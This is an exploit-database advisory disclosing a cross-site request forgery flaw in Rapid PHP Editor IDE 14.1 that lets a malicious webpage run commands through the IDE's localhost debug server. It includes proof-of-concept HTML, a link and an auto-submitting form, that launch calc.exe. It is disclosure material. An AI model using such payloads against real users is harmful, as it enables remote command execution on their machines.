Rapid PHP Editor IDE 14.1 Cross Site Request Forgery Vulnerability

2016-11-04T00:00:00
ID 1337DAY-ID-26245
Type zdt
Reporter hyp3rlinx
Modified 2016-11-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [+] Credits: John Page aka hyp3rlinx


Vendor:
======================
www.rapidphpeditor.com



Product:
===============================
Rapid PHP Editor IDE
rapidphp2016.exe v14.1


Rapid PHP editor is a faster and more powerful PHP editor for Windows
combining features of a fully-packed PHP IDE with
the speed of the Notepad. Rapid PHP is the most complete all-in-one
software for coding PHP, HTML, CSS, JavaScript and
other web development languages with tools for debugging, validating,
reusing, navigating and formatting your code.



Vulnerability Type:
=============================
CSRF Remote Command Execution



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

There is a Remote Command Execution ailment in this IDE, if a user of this
IDE is running the internal debug server
listening on localhost port 89 and they open a link or visit a malicious
webpage then remote attackers can execute arbitrary
commands on the victims system.

Reference:
http://forums.blumentals.net/viewtopic.php?f=15&t=7062


Exploit code(s):
================

Call Windows "calc.exe" as POC

<a href="http://127.0.0.1:89/~C/Windows/system32/calc.exe">Click it!</a>

OR

<form action="http://127.0.0.1:89/~C/Windows/system32/calc.exe"
method="post">
<script>document.forms[0].submit()</script>
</form>


#  0day.today [2018-03-19]  #